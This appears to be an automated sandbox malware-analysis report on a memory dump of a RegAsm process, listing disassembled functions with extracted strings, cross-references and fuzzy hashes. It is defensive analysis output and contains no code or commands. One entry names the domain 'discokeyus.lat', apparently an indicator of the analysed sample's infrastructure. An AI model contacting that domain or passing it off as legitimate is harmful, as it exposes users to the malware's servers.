Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796

Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON

Download Yara Rule

Strings

gfff, xrefs: 00417747
r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: gfff$i$r}A
API String ID: 0-3931832132
Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786

Function 00422510 Relevance: 4.2, Strings: 3, Instructions: 454COMMON

Download Yara Rule

Strings

st, xrefs: 0042253E
<pr, xrefs: 00422536
y./, xrefs: 00422715

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: <pr$st$y./
API String ID: 0-3839595785
Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A

Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

34, xrefs: 0041D46A
C], xrefs: 0041D471
|F, xrefs: 0041D40A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A

Function 00418792 Relevance: 4.1, Strings: 3, Instructions: 378COMMON

Download Yara Rule

Strings

#XXL, xrefs: 00418808, 00418BDB
=, xrefs: 004187A4
BC, xrefs: 004189F6

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #XXL$=$BC
API String ID: 0-2546488661
Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96

Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

Ef, xrefs: 0042E24E
sWK), xrefs: 0042E049
TQ][, xrefs: 0042E307

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7

Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

_, xrefs: 0041B428
+|-~, xrefs: 0041B306
/pqr, xrefs: 0041B30E

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D

Function 00425327 Relevance: 3.2, Strings: 2, Instructions: 742COMMON

Download Yara Rule

Strings

9YB, xrefs: 00425933
"51s, xrefs: 004253CB

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "51s$9YB
API String ID: 0-2722061943
Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54

Function 0040DBD9 Relevance: 3.0, Strings: 2, Instructions: 528COMMON

Download Yara Rule

Strings

discokeyus.lat, xrefs: 0040DF76, 0040E316
Dx, xrefs: 0040E139

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Dx$discokeyus.lat
API String ID: 0-1480405892
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97

Function 004231C2 Relevance: 2.9, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

R2B, xrefs: 0042321B, 0042323E
6B, xrefs: 004236D0

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: R2B$6B
API String ID: 0-20043878
Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58

Function 00420F50 Relevance: 2.9, Strings: 2, Instructions: 429COMMON

Download Yara Rule

Strings

XG, xrefs: 0042101C
|}, xrefs: 004212E7

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: XG$|}
API String ID: 0-1014376750
Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56

Function 00404320 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 0040439B
IEND, xrefs: 00404711

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 2936136e7c09e34564bd729017d030b62aa5c2817fbff3935057bfed89b429c8
Instruction ID: dbf6d47144c6b822b2acdb98883b9d528113f132bac91ec627b85730d464e823
Opcode Fuzzy Hash: 2936136e7c09e34564bd729017d030b62aa5c2817fbff3935057bfed89b429c8
Instruction Fuzzy Hash: 34D1CEB15083449FE720CF14D84575FBBE4AB94308F14492EFA99AB3C2E779D908CB96

Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: i$r}A
API String ID: 2994545307-2976846027
Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA

Function 0042A33F Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

d, xrefs: 0042A047
d, xrefs: 0042A10D

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: d$d
API String ID: 0-195624457
Opcode ID: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
Instruction ID: a6a5a8ac2d59b7de1a8b575b3a10bb681eff341670204cea3f60d1849e0cf04e
Opcode Fuzzy Hash: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
Instruction Fuzzy Hash: F1513A36908320CBC714CF24D85162BB7D2AB8A718F494A6DECC9A7351D7369D15CB8B

Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

P<?, xrefs: 00418590
P<?, xrefs: 00418680

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: P<?$P<?
API String ID: 0-3449142988
Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B

Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON

Download Yara Rule

Strings

f, xrefs: 0043B3F1

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A

Function 0043D880 Relevance: 1.9, Strings: 1, Instructions: 641COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88

Function 0043D980 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88

Function 0043D999 Relevance: 1.8, Strings: 1, Instructions: 522COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88

Function 0043D997 Relevance: 1.8, Strings: 1, Instructions: 521COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88

Function 00438F59 Relevance: 1.7, Strings: 1, Instructions: 496COMMON

Download Yara Rule

Strings

jk, xrefs: 0043938C

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: jk
API String ID: 0-78326018
Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754

Function 0043DA80 Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84

Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

{}, xrefs: 00425F9D

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: {}
API String ID: 0-4269290415
Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A

Function 0042AC90 Relevance: 1.7, Strings: 1, Instructions: 430COMMON

Download Yara Rule

Strings

", xrefs: 0042AF88

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6

Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 004388F5

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: /,-
API String ID: 2994545307-1700940157
Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A

Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

VtA, xrefs: 004163A1

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: VtA
API String ID: 2994545307-3724035812
Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A

Function 0043DB60 Relevance: 1.6, Strings: 1, Instructions: 397COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84

Function 004252DD Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

9YB, xrefs: 00425933

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 9YB
API String ID: 0-659603884
Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84

Function 00408330 Relevance: 1.5, Strings: 1, Instructions: 291COMMON

Download Yara Rule

Strings

., xrefs: 00408389

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5

Function 00430940 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

0, xrefs: 004309C1

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
Instruction ID: 9f054d13e7867a4d77ca7132c07c00ca598ea50f9319f8eda39875565fe9693e
Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
Instruction Fuzzy Hash: AD914827759A8007D31C9E3D5C622A7BA834BEB330F2DD37EA5B1CB3E5D56888064359

Function 00405EE0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 00406016

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 6b8a4f0fabbfe26aa1da2124c088442218b17e99f03b7e47905338ccd447f468
Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
Opcode Fuzzy Hash: 6b8a4f0fabbfe26aa1da2124c088442218b17e99f03b7e47905338ccd447f468
Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67

Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042B36E

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA

Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

klm, xrefs: 0041D9AC

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A

Function 004288CB Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

pF, xrefs: 004289C2

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: pF
API String ID: 0-4112324664
Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81

